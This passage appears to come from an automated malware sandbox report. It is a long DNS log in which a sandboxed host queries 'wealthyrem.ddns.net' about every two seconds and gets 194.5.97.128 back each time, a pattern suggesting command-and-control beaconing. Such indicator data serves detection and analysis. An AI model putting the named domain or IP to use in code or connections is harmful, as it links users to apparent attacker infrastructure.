              Aug 3, 2021 18:04:13.742794991 CEST192.168.2.78.8.8.80x4252Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:16.432327032 CEST192.168.2.78.8.8.80xc1acStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:18.622884989 CEST192.168.2.78.8.8.80x17fbStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:20.852276087 CEST192.168.2.78.8.8.80x6718Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:23.043164968 CEST192.168.2.78.8.8.80x9b99Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:25.248914957 CEST192.168.2.78.8.8.80x1bb4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:27.449661016 CEST192.168.2.78.8.8.80x108aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:29.668241978 CEST192.168.2.78.8.8.80x8de1Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:31.869529963 CEST192.168.2.78.8.8.80x13adStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:34.244858027 CEST192.168.2.78.8.8.80xd2b9Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:36.483568907 CEST192.168.2.78.8.8.80xcd9dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:38.694935083 CEST192.168.2.78.8.8.80xa6cbStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:40.927027941 CEST192.168.2.78.8.8.80xf65dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:43.148438931 CEST192.168.2.78.8.8.80xcbd7Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:45.355446100 CEST192.168.2.78.8.8.80x19e1Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:47.541191101 CEST192.168.2.78.8.8.80xbde2Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:49.799333096 CEST192.168.2.78.8.8.80x8f91Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:53.196739912 CEST192.168.2.78.8.8.80xa6f0Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:55.389027119 CEST192.168.2.78.8.8.80x2fd6Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:57.591773987 CEST192.168.2.78.8.8.80x813dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:04:59.795327902 CEST192.168.2.78.8.8.80x903aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:01.986629009 CEST192.168.2.78.8.8.80x264aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:04.179060936 CEST192.168.2.78.8.8.80xefb3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:06.370069027 CEST192.168.2.78.8.8.80x4fc4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:08.592544079 CEST192.168.2.78.8.8.80xd1f4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:11.766412020 CEST192.168.2.78.8.8.80x5a16Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:13.996082067 CEST192.168.2.78.8.8.80x8e29Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:16.184967995 CEST192.168.2.78.8.8.80x3c60Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:18.386063099 CEST192.168.2.78.8.8.80xedbbStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:20.575215101 CEST192.168.2.78.8.8.80x9e9Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:22.764461040 CEST192.168.2.78.8.8.80x378Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:25.003761053 CEST192.168.2.78.8.8.80x87e4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:27.221846104 CEST192.168.2.78.8.8.80xd4aaStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:30.703397036 CEST192.168.2.78.8.8.80x1d87Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:33.031140089 CEST192.168.2.78.8.8.80x4a12Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:35.231430054 CEST192.168.2.78.8.8.80x7c58Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:37.450562000 CEST192.168.2.78.8.8.80x9baaStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:39.653464079 CEST192.168.2.78.8.8.80x643fStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:41.900424957 CEST192.168.2.78.8.8.80x582dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:44.099422932 CEST192.168.2.78.8.8.80x835dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:46.318114996 CEST192.168.2.78.8.8.80xb619Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:49.050117970 CEST192.168.2.78.8.8.80xad66Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:51.279237032 CEST192.168.2.78.8.8.80x2e1aStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:53.496871948 CEST192.168.2.78.8.8.80x421bStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:55.702008009 CEST192.168.2.78.8.8.80xc87Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:05:57.925591946 CEST192.168.2.78.8.8.80xee3fStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:00.129034042 CEST192.168.2.78.8.8.80xe089Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:02.342406988 CEST192.168.2.78.8.8.80xc548Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:04.561638117 CEST192.168.2.78.8.8.80x86c3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:06.782063007 CEST192.168.2.78.8.8.80x4a5cStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:08.985441923 CEST192.168.2.78.8.8.80x9c4Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:11.207012892 CEST192.168.2.78.8.8.80x33baStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:13.475601912 CEST192.168.2.78.8.8.80x571eStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:15.661334038 CEST192.168.2.78.8.8.80x6b30Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:17.860109091 CEST192.168.2.78.8.8.80x4ea5Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:20.232481003 CEST192.168.2.78.8.8.80x1cc7Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:22.489272118 CEST192.168.2.78.8.8.80xb059Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:24.708709002 CEST192.168.2.78.8.8.80x437fStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:26.908519983 CEST192.168.2.78.8.8.80x4247Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:29.123908043 CEST192.168.2.78.8.8.80x5512Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:31.318967104 CEST192.168.2.78.8.8.80xd5e3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:33.526235104 CEST192.168.2.78.8.8.80xf54dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:35.725197077 CEST192.168.2.78.8.8.80x75c3Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:37.910315990 CEST192.168.2.78.8.8.80xc0a5Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:41.046650887 CEST192.168.2.78.8.8.80x7b64Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:43.236715078 CEST192.168.2.78.8.8.80x1dStandard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:45.437988043 CEST192.168.2.78.8.8.80xfd8Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:47.642828941 CEST192.168.2.78.8.8.80xb137Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)
              Aug 3, 2021 18:06:49.829391956 CEST192.168.2.78.8.8.80x7a24Standard query (0)wealthyrem.ddns.netA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Aug 3, 2021 17:58:16.621526003 CEST8.8.8.8192.168.2.70x6f82No error (0)clientconfig.passport.netauthgfx.msa.akadns6.netCNAME (Canonical name)IN (0x0001)
              Aug 3, 2021 18:00:40.761003017 CEST8.8.8.8192.168.2.70x738dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:00:42.986603022 CEST8.8.8.8192.168.2.70x90c7No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:00:45.200649023 CEST8.8.8.8192.168.2.70x56c0No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:00:47.415944099 CEST8.8.8.8192.168.2.70x99eeNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:00:49.603174925 CEST8.8.8.8192.168.2.70x7ab2No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:00:51.812900066 CEST8.8.8.8192.168.2.70x31cdNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:00:54.018591881 CEST8.8.8.8192.168.2.70xdaf9No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:00:56.278626919 CEST8.8.8.8192.168.2.70x350No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:00:58.484508038 CEST8.8.8.8192.168.2.70xcfcaNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:00.686336040 CEST8.8.8.8192.168.2.70xae34No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:02.893786907 CEST8.8.8.8192.168.2.70xf50eNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:05.097134113 CEST8.8.8.8192.168.2.70x8ff2No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:07.305535078 CEST8.8.8.8192.168.2.70xe6a3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:09.539190054 CEST8.8.8.8192.168.2.70x2701No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:11.859661102 CEST8.8.8.8192.168.2.70xf0b5No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:15.058917046 CEST8.8.8.8192.168.2.70x3e9eNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:17.270273924 CEST8.8.8.8192.168.2.70x3d9eNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:19.490765095 CEST8.8.8.8192.168.2.70x3138No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:21.704298019 CEST8.8.8.8192.168.2.70xc0beNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:23.886974096 CEST8.8.8.8192.168.2.70xed2cNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:26.071243048 CEST8.8.8.8192.168.2.70xa6abNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:28.346940041 CEST8.8.8.8192.168.2.70xe72No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:30.546425104 CEST8.8.8.8192.168.2.70x73No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:32.729451895 CEST8.8.8.8192.168.2.70x4deeNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:34.942574024 CEST8.8.8.8192.168.2.70x125No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:37.136523008 CEST8.8.8.8192.168.2.70x3b76No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:39.335952044 CEST8.8.8.8192.168.2.70xe6e0No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:41.540939093 CEST8.8.8.8192.168.2.70x14edNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:43.783260107 CEST8.8.8.8192.168.2.70x53a1No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:45.997164011 CEST8.8.8.8192.168.2.70xd0bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:48.197298050 CEST8.8.8.8192.168.2.70xd981No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:50.403202057 CEST8.8.8.8192.168.2.70xe3acNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:52.601558924 CEST8.8.8.8192.168.2.70x8a7No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:54.808830976 CEST8.8.8.8192.168.2.70x2605No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:56.996222019 CEST8.8.8.8192.168.2.70x87f4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:01:59.268136978 CEST8.8.8.8192.168.2.70xb27aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:01.475634098 CEST8.8.8.8192.168.2.70x5296No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:03.671786070 CEST8.8.8.8192.168.2.70xac70No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:07.007635117 CEST8.8.8.8192.168.2.70xb39fNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:09.203102112 CEST8.8.8.8192.168.2.70x6b0fNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:11.403228998 CEST8.8.8.8192.168.2.70x1c7No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:13.610809088 CEST8.8.8.8192.168.2.70xc54bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:15.977773905 CEST8.8.8.8192.168.2.70xcd0bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:18.978045940 CEST8.8.8.8192.168.2.70xf049No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:21.190454006 CEST8.8.8.8192.168.2.70x3892No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:23.369951963 CEST8.8.8.8192.168.2.70x991No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:25.565526962 CEST8.8.8.8192.168.2.70x25efNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:27.766803026 CEST8.8.8.8192.168.2.70xdaabNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:29.953804970 CEST8.8.8.8192.168.2.70x9f46No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:32.196198940 CEST8.8.8.8192.168.2.70x5b39No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:34.395683050 CEST8.8.8.8192.168.2.70x3531No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:36.598649979 CEST8.8.8.8192.168.2.70xb7a6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:38.814450979 CEST8.8.8.8192.168.2.70x42e2No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:41.020540953 CEST8.8.8.8192.168.2.70x20bfNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:43.230957031 CEST8.8.8.8192.168.2.70x27d7No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:45.415544033 CEST8.8.8.8192.168.2.70x58b6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:47.665286064 CEST8.8.8.8192.168.2.70x5cc6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:49.849251986 CEST8.8.8.8192.168.2.70xe02bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:52.054344893 CEST8.8.8.8192.168.2.70x186dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:54.227219105 CEST8.8.8.8192.168.2.70x2186No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:56.434458971 CEST8.8.8.8192.168.2.70x2323No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:02:58.624461889 CEST8.8.8.8192.168.2.70xd3f6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:00.814369917 CEST8.8.8.8192.168.2.70x4b6dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:03.089088917 CEST8.8.8.8192.168.2.70x4c22No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:04.696907997 CEST8.8.8.8192.168.2.70x75c7No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
              Aug 3, 2021 18:03:05.286665916 CEST8.8.8.8192.168.2.70xd143No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:07.507150888 CEST8.8.8.8192.168.2.70x9af0No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:09.706294060 CEST8.8.8.8192.168.2.70xaf82No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:11.925440073 CEST8.8.8.8192.168.2.70x7d29No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:14.144275904 CEST8.8.8.8192.168.2.70x9932No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:16.334412098 CEST8.8.8.8192.168.2.70xde69No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:18.609951973 CEST8.8.8.8192.168.2.70x2e68No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:20.857263088 CEST8.8.8.8192.168.2.70x798bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:23.414494038 CEST8.8.8.8192.168.2.70x8e2fNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:25.596151114 CEST8.8.8.8192.168.2.70x4611No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:27.820512056 CEST8.8.8.8192.168.2.70xa107No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:30.006797075 CEST8.8.8.8192.168.2.70xcfe7No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:32.305104971 CEST8.8.8.8192.168.2.70x8b08No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:34.674105883 CEST8.8.8.8192.168.2.70x8116No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:36.870151043 CEST8.8.8.8192.168.2.70xd602No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:39.802304029 CEST8.8.8.8192.168.2.70x16aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:42.600116968 CEST8.8.8.8192.168.2.70x92fNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:44.808240891 CEST8.8.8.8192.168.2.70x88a6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:47.031979084 CEST8.8.8.8192.168.2.70xa4e6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:49.317770004 CEST8.8.8.8192.168.2.70xdf82No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:51.520335913 CEST8.8.8.8192.168.2.70xff63No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:53.726793051 CEST8.8.8.8192.168.2.70xa21cNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:55.942558050 CEST8.8.8.8192.168.2.70x8a7eNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:03:58.180290937 CEST8.8.8.8192.168.2.70x5e20No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:00.387912989 CEST8.8.8.8192.168.2.70x4f3bNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:02.602576017 CEST8.8.8.8192.168.2.70xa9e6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:04.860369921 CEST8.8.8.8192.168.2.70x8f00No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:07.058125019 CEST8.8.8.8192.168.2.70xf3e7No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:09.243210077 CEST8.8.8.8192.168.2.70xb88cNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:11.430680037 CEST8.8.8.8192.168.2.70xd8f3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:13.775387049 CEST8.8.8.8192.168.2.70x4252No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:16.467454910 CEST8.8.8.8192.168.2.70xc1acNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:18.651566029 CEST8.8.8.8192.168.2.70x17fbNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:20.887847900 CEST8.8.8.8192.168.2.70x6718No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:23.075534105 CEST8.8.8.8192.168.2.70x9b99No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:25.284774065 CEST8.8.8.8192.168.2.70x1bb4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:27.485532999 CEST8.8.8.8192.168.2.70x108aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:29.703403950 CEST8.8.8.8192.168.2.70x8de1No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:31.897357941 CEST8.8.8.8192.168.2.70x13adNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:34.277890921 CEST8.8.8.8192.168.2.70xd2b9No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:36.511339903 CEST8.8.8.8192.168.2.70xcd9dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:38.731224060 CEST8.8.8.8192.168.2.70xa6cbNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:40.959721088 CEST8.8.8.8192.168.2.70xf65dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:43.182590008 CEST8.8.8.8192.168.2.70xcbd7No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:45.390722990 CEST8.8.8.8192.168.2.70x19e1No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:47.577378988 CEST8.8.8.8192.168.2.70xbde2No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:49.836647987 CEST8.8.8.8192.168.2.70x8f91No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:53.229334116 CEST8.8.8.8192.168.2.70xa6f0No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:55.424460888 CEST8.8.8.8192.168.2.70x2fd6No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:57.624083042 CEST8.8.8.8192.168.2.70x813dNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:04:59.828027010 CEST8.8.8.8192.168.2.70x903aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:02.019203901 CEST8.8.8.8192.168.2.70x264aNo error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:04.214956045 CEST8.8.8.8192.168.2.70xefb3No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
              Aug 3, 2021 18:05:06.404021978 CEST8.8.8.8192.168.2.70x4fc4No error (0)wealthyrem.ddns.net194.5.97.128A (IP address)IN (0x0001)
